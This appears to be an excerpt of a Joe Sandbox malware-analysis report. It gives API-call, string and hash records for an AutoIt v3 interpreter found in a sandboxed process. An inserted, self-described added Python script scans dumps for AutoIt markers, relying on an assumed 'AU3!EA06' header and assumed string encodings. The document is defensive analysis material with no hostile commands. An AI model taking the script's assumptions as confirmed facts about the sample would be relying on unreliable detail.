• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
APIs
• GetModuleHandleW.KERNEL32(00000001,00007FF7AA13BC28,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7AA0F475D), ref: 00007FF7AA167CE6
• LoadStringW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7AA0F475D,?,00007FF7AA0F3C00), ref: 00007FF7AA167D00
• wprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AA167D43
• MessageBoxW.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF7AA0F475D,?,00007FF7AA0F3C00), ref: 00007FF7AA167DD7
Strings
Memory Dump Source
• Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
• Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
• API ID: HandleLoadMessageModuleStringwprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 4007322891-4153970271
                                                                                                      • Opcode ID: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction ID: 0960f997be4a07f37090bbf8114ce453a8d347b80764567a37dc6089d83f26db
                                                                                                      • Opcode Fuzzy Hash: afe30fabcc8c2b5dfb3624d463207571e08e071ef3068ceab152869195660280
                                                                                                      • Instruction Fuzzy Hash: AA318C72A19A83E1EB11EB14F4805AEA361FB84B84FC24076EA4D476A9DF3CD51BC750
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
  • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
  • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
  • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
  • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
  • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
  • String ID: AutoIt v3 GUI$TaskbarCreated
  • API String ID: 2914291525-2659433951
  • Opcode ID: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
  • Instruction ID: 92b075257d9c98ac7cd309ee392b289e590aee270d569b93c777132529219437
  • Opcode Fuzzy Hash: 97a1d40f626d07f8b6b8daa48bc59cc996610198c86794b7ab60cb7639f08fb7
  • Instruction Fuzzy Hash: B0315572A09B41EAF751AF60F8443A8B7B4FB58358F950178CA9D03B64CF7C915ACB60
APIs
    • Part of subcall function 00007FF7AA0F2794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF7AA13A57D), ref: 00007FF7AA0F27B1
  • PostMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A156E
  • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A157F
  • GetDlgCtrlID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A158C
  • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A16C3
  • GetMenuItemCount.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A16E1
  • GetMenuItemID.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A16F6
  • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A1731
  • GetMenuItemInfoW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A177C
  • CheckMenuRadioItem.USER32 ref: 00007FF7AA1A17B3
    • Part of subcall function 00007FF7AA1A02A8: IsWindow.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA13A2D7), ref: 00007FF7AA1A036D
    • Part of subcall function 00007FF7AA1A02A8: IsWindowEnabled.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA13A2D7), ref: 00007FF7AA1A037A
  • DefDlgProcW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AA1A17EA
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: the same six .sdmp dumps of process 00000011 (00007FF7AA0F0000, 00007FF7AA1A5000, 00007FF7AA1C8000, 00007FF7AA1DA000, 00007FF7AA1DE000, 00007FF7AA1E4000) listed in full above
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
  • String ID:
  • API String ID: 2672075419-0
  • Opcode ID: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
  • Instruction ID: b8943958ff014f0ac220fada5ffc17215da0de607eb18e9a2c84e820974be337
  • Opcode Fuzzy Hash: 5de48b37807cf5e9572c5b55aff88bc579260c59b463e26447def2c6e42a81eb
  • Instruction Fuzzy Hash: 50919176B0A612EAF752EF61E4402BDA3B1BB44B98F960075DE4D437A5CE38E447C720
APIs
    • Part of subcall function 00007FF7AA0F780C: CreateFileW.KERNEL32 ref: 00007FF7AA0F7876
    • Part of subcall function 00007FF7AA1141D0: GetCurrentDirectoryW.KERNEL32(?,00007FF7AA0F99C7), ref: 00007FF7AA1141EC
    • Part of subcall function 00007FF7AA0F5A50: GetFullPathNameW.KERNEL32(?,00007FF7AA0F5A3D,?,00007FF7AA0F4C50,?,?,?,00007FF7AA0F109E), ref: 00007FF7AA0F5A7B
  • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7AA0F9A60
  • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7AA0F9BA0
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: the same six .sdmp dumps of process 00000011 (00007FF7AA0F0000, 00007FF7AA1A5000, 00007FF7AA1C8000, 00007FF7AA1DA000, 00007FF7AA1DE000, 00007FF7AA1E4000) listed in full above
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
  • API String ID: 2207129308-3738523708
  • Opcode ID: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
  • Instruction ID: 5acc204b8cd7b9b270c5f31e64bfc7cbbeab8bcbce124797c5eb8ad3831a928c
  • Opcode Fuzzy Hash: da8776b3935f108f372e0f447b79be8c4908acda2ed79a75d128fc386c9bb0f4
  • Instruction Fuzzy Hash: 54127F22A1A643D5FB51EF21E4801BEA770FB84794FC20572EA4E536A9EF3CD546C720
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: the same six .sdmp dumps of process 00000011 (00007FF7AA0F0000, 00007FF7AA1A5000, 00007FF7AA1C8000, 00007FF7AA1DA000, 00007FF7AA1DE000, 00007FF7AA1E4000) listed in full above
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID: DestroySendStringUninitializeUnregisterWindow
  • String ID: close all
  • API String ID: 1992507300-3243417748
  • Opcode ID: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
  • Instruction ID: 5089ad468d59ae5e17c169056bdddf59b31e8122025c271dce4098cd962af4d9
  • Opcode Fuzzy Hash: 5baaea7a998fb5a64be74ad77031d7567826fe4b93f306c701784b71cba838e4
  • Instruction Fuzzy Hash: F2D12426B0B903D1FE99EF16D5902BEA360AF44B44F9540B5DB0E672A1DF38D8778720
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: the same six .sdmp dumps of process 00000011 (00007FF7AA0F0000, 00007FF7AA1A5000, 00007FF7AA1C8000, 00007FF7AA1DA000, 00007FF7AA1DE000, 00007FF7AA1E4000) listed in full above
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID:
  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
  • API String ID: 0-1765764032
  • Opcode ID: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
  • Instruction ID: 9c23c36d8f62b7c09cadf806c003a645dd04a2b65b4bfe416c9ca2effca76e4c
  • Opcode Fuzzy Hash: 7e2a3d229f0fbfbb0bb3e4ac55cef0babde8bd6d800c2740a403695577890c75
  • Instruction Fuzzy Hash: B5A19A36A09B41E6FB22AF61E4402BDA7B5FB98B98F860176CA4D03764CF3CD446C751
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: the same six .sdmp dumps of process 00000011 (00007FF7AA0F0000, 00007FF7AA1A5000, 00007FF7AA1C8000, 00007FF7AA1DA000, 00007FF7AA1DE000, 00007FF7AA1E4000) listed in full above
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID: MessageSend$Window$CreateObjectStockwcscat
  • String ID: -----$SysListView32
  • API String ID: 2361508679-3975388722
  • Opcode ID: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
  • Instruction ID: 86566effe9ade56d9629abc7e8cc86325a7cd6a9dc89d55f139980ea0a4f1a0a
  • Opcode Fuzzy Hash: ea816c629daf7890c5ddb102d8fb278a57c9d15cc399289f831795b74fbae7da
  • Instruction Fuzzy Hash: 3351BF32A05791EAE721DF24E8446E9B3B1FB48788F81017AEE4C47B65DF38D556CB40
APIs
  • GetSysColorBrush.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D06
  • LoadCursorW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D16
  • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D2B
  • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D44
  • LoadIconW.USER32(?,?,?,?,?,?,?,?,?,00007FF7AA0F3C7D,?,?,?,?,?,00007FF7AA0F2BC1), ref: 00007FF7AA0F3D5D
  • LoadImageW.USER32 ref: 00007FF7AA0F3D89
  • RegisterClassExW.USER32 ref: 00007FF7AA0F3DED
    • Part of subcall function 00007FF7AA0F3EF8: GetSysColorBrush.USER32 ref: 00007FF7AA0F3F4D
    • Part of subcall function 00007FF7AA0F3EF8: RegisterClassExW.USER32 ref: 00007FF7AA0F3F7E
    • Part of subcall function 00007FF7AA0F3EF8: RegisterWindowMessageW.USER32 ref: 00007FF7AA0F3F92
    • Part of subcall function 00007FF7AA0F3EF8: InitCommonControlsEx.COMCTL32 ref: 00007FF7AA0F3FB0
    • Part of subcall function 00007FF7AA0F3EF8: ImageList_Create.COMCTL32 ref: 00007FF7AA0F3FCB
    • Part of subcall function 00007FF7AA0F3EF8: LoadIconW.USER32 ref: 00007FF7AA0F3FE4
    • Part of subcall function 00007FF7AA0F3EF8: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF7AA0F3FF7
Memory Dump Source
  • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
  • Associated: the same six .sdmp dumps of process 00000011 (00007FF7AA0F0000, 00007FF7AA1A5000, 00007FF7AA1C8000, 00007FF7AA1DA000, 00007FF7AA1DE000, 00007FF7AA1E4000) listed in full above
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
Similarity
  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
  • String ID: AutoIt v3
  • API String ID: 423443420-1704141276
  • Opcode ID: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
  • Instruction ID: 7d4661b7713f2d52d4e7a5b9c40aa4504fb07a1ad95a53b139d14f1e4f4e761a
  • Opcode Fuzzy Hash: 5d34682438d4925233b099617d424a34890b62ea6906e6c19d5122f867670d4b
  • Instruction Fuzzy Hash: AC313836A0AB42EAF752EB90F844379B3B4BB94758F850179C94D13B28DF7C9156C720
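The script-loader record above (CreateFileW / GetFullPathNameW / SetCurrentDirectoryW with the strings "AU3!", "EA06" and "#include depth exceeded") and the two RegisterClassExW records that register the "AutoIt v3" and "AutoIt v3 GUI" window classes together identify the module dumped at offset 00007FF7AA0F0000 in process 00000011 as an AutoIt v3 interpreter. The following triage script is an added example, not part of the Joe Sandbox report and not Joe Sandbox or AutoIt code: pointed at one of the .sdmp dumps named above (or at the original PE), it reports the offset of every such marker and a coarse verdict. It assumes the window-class and interpreter error strings are stored UTF-16LE in this 64-bit build (an ASCII copy is tried as well), and that the compiled-script header is the 8-byte ASCII marker "AU3!EA06", i.e. the two strings the report lists separately, concatenated; the sample buffer at the bottom is constructed for the demonstration and is not real dump data.

```python
"""Triage scan for the AutoIt v3 interpreter markers listed in the function records.

Added example, not Joe Sandbox or AutoIt code. Assumptions: window-class and
interpreter error strings are UTF-16LE in the 64-bit PE (RegisterClassExW and
other wide-string APIs are used), an ASCII copy is tried for ANSI builds, and the
compiled-script header is the ASCII marker "AU3!EA06" (the report shows "AU3!"
and "EA06" only as separate string references).
"""
import sys

# Strings the report attributes to the module at 0x7FF7AA0F0000 (process 0x11).
TEXT_MARKERS = (
    "AutoIt v3 GUI",
    "AutoIt v3",
    "#include depth exceeded",
    "Bad directive syntax error",
    "Unterminated string",
)
# Assumed script-container signature: the page's "AU3!" + "EA06" concatenated.
AU3_SIGNATURE = b"AU3!EA06"


def _needles():
    """(label, byte pattern) pairs, longest first, so a shorter marker such as
    "AutoIt v3" is not double-counted inside the longer "AutoIt v3 GUI"."""
    pairs = [(f"{s} [utf-16le]", s.encode("utf-16-le")) for s in TEXT_MARKERS]
    pairs += [(f"{s} [ascii]", s.encode("ascii")) for s in TEXT_MARKERS]
    pairs.append(("AU3!EA06", AU3_SIGNATURE))
    return sorted(pairs, key=lambda p: len(p[1]), reverse=True)


def _find_all(data: bytes, needle: bytes):
    pos = data.find(needle)
    while pos != -1:
        yield pos
        pos = data.find(needle, pos + 1)


def scan_autoit_markers(data: bytes) -> dict:
    """Return {label: [offsets]} for every marker present in `data`."""
    hits = {}
    claimed = []  # byte ranges already attributed to a longer marker
    for label, needle in _needles():
        offsets = []
        for start in _find_all(data, needle):
            end = start + len(needle)
            if any(s <= start and end <= e for s, e in claimed):
                continue  # lies entirely inside a longer marker already counted
            offsets.append(start)
            claimed.append((start, end))
        if offsets:
            hits[label] = offsets
    return hits


def classify(hits: dict) -> str:
    """Coarse verdict: interpreter strings alone mean an AutoIt runtime image;
    the AU3!EA06 header means a compiled script container is also present."""
    runtime = any(label != "AU3!EA06" for label in hits)
    script = "AU3!EA06" in hits
    if runtime and script:
        return "autoit-runtime+embedded-script"
    if runtime:
        return "autoit-runtime"
    if script:
        return "autoit-script-container"
    return "no-autoit-markers"


def scan_file(path: str) -> dict:
    """Scan a memory dump (.sdmp) or PE file on disk."""
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


# Constructed sample buffer (not a real dump): padding, two wide window-class
# names, one wide interpreter error string, then the script header marker.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "#include depth exceeded. Make sure there are no recursive includes".encode("utf-16-le")
    + b"\x00\x00"
    + b"\xff" * 4
    + AU3_SIGNATURE
)

if __name__ == "__main__":
    found = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_autoit_markers(SAMPLE_DUMP)
    for label, offsets in found.items():
        print(f"{label:40s} {', '.join(hex(o) for o in offsets)}")
    print("verdict:", classify(found))
```

Finding only the window-class and error strings in a dump is expected here, since the dumped image is the interpreter itself; the AU3!EA06 header normally sits in the script container appended to or embedded in the dropped executable, so run the same scan over file.exe and the dropped files to locate the compiled script for extraction.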
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                      • Instruction ID: adca016fced46782754e4da8c652307dfe6f560c9f241626615a40c26ab45bcc
                                                                                                      • Opcode Fuzzy Hash: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                      • Instruction Fuzzy Hash: ABC1CF32B1AA41DAFB55DF64E4803AC77B1A7497A8F424275DE2E5B7A4CF38D016C320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3210457359-0
                                                                                                      • Opcode ID: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                      • Instruction ID: 1d06f122d975a7c284f3c1b2e13220d5f440621b00d693d77e18a34cde1ac0f9
                                                                                                      • Opcode Fuzzy Hash: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                      • Instruction Fuzzy Hash: 70618631A0A543EAF766BA25E440BB9EB62BF40B94F928075E94D026F5CE3CE443D750
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                      • API String ID: 3721556410-2107944366
                                                                                                      • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                      • Instruction ID: 606b81365e73b6c3337c5cb00be0093833b198344c0c6a984037db15c8f5773b
                                                                                                      • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                      • Instruction Fuzzy Hash: 6061AB72A1AA52E6FB11EF61E8805ADB770FB44B98F820176E90D13AB5DF38D446C350
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: fputwcfwprintf
                                                                                                      • String ID: %*.*s$%-*.*s$%.*s
                                                                                                      • API String ID: 3232229890-4054516066
                                                                                                      • Opcode ID: 091f6d06562d500ade4900664ac70f4b207829fc3b6deb1cd0af7661ad57b24c
                                                                                                      • Instruction ID: 662f305576073c1f2336a2f32136ca90500da4838ef4b6843b47684f050ca13d
                                                                                                      • Opcode Fuzzy Hash: 091f6d06562d500ade4900664ac70f4b207829fc3b6deb1cd0af7661ad57b24c
                                                                                                      • Instruction Fuzzy Hash: C4519773600F358BE73A8F5AE05872A7BA1E744790F118159EBDB87AD2DB39D4C19B00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                      • String ID: 2$P
                                                                                                      • API String ID: 93392585-1110268094
                                                                                                      • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction ID: c83fa5676241f87b6bac18754a46ac420b04ad8573c68ff4322c1fd3638667e9
                                                                                                      • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction Fuzzy Hash: 03514532E0A752E9F726AF21E4402BCB7B9AB00759F594075CA5E936A5CF38E443D321
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                      • API String ID: 2595394609-2123141913
                                                                                                      • Opcode ID: 038fd8892ea4505ef95e7aff6c2d4318c30ef29dc954c6865875ce570fc3ca79
                                                                                                      • Instruction ID: 04b4d80557b02638dd494d2a906174b309f9fb383232fbe84ecace3f074c368b
                                                                                                      • Opcode Fuzzy Hash: 038fd8892ea4505ef95e7aff6c2d4318c30ef29dc954c6865875ce570fc3ca79
                                                                                                      • Instruction Fuzzy Hash: FD418C77200E7483EA639F86E84C7982FA0F784BC0F544592CE9A977A3DA39C9C1C340
                                                                                                      APIs
                                                                                                      Strings
